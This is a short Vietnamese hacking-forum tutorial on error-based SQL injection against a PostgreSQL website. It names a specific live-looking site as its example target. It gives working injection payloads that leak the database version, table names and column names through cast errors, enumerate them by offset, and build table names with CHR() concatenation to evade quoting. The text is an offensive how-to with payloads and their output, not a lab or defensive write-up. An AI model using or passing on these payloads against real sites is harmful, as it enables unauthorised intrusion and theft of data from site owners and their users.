Hướng dẫn khai thác site postgreSQL

Hôm nay mình chỉ sơ sơ cho ae cách khai thác site này, để lần sau có gặp thì làm tượng tự. Vì hôm nay đang bận code tool nên ko thể up đầy đủ cho ae được,nên mình chỉ up cái cơ bản Lấy site của Unknow làm ví dụ nhé http://www.seemanns.co.za/productlist.php?rangeid=2 Get version() Quote: and 1=cast(version() as int)-- =>PostgreSQL 8.3.12 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Ubuntu 4.3.3-5ubuntu4) 4.3.3 Get table_name và column_name ta dùng limit offset nhé Quote: and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)-- =>pg_type: Đây chính là table đầu tiên của nó, ta cứ tăng offset 0 đến hết để tìm ra table cần tìm Khi đã tìm được table thì conver to ORACLE CHAR nhé Quote: and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)-- =>typname : Đây là column đầu tiên có trong table pg_type Cứ thế mà tiếp tục nhé Get thông tin, khi đã có column trong table Quote: and 1=cast((select typname from pg_type limit 1 offset 0) as int)-- tới đây thôi nhé, có gì up sau, bận quá BY thanggiangho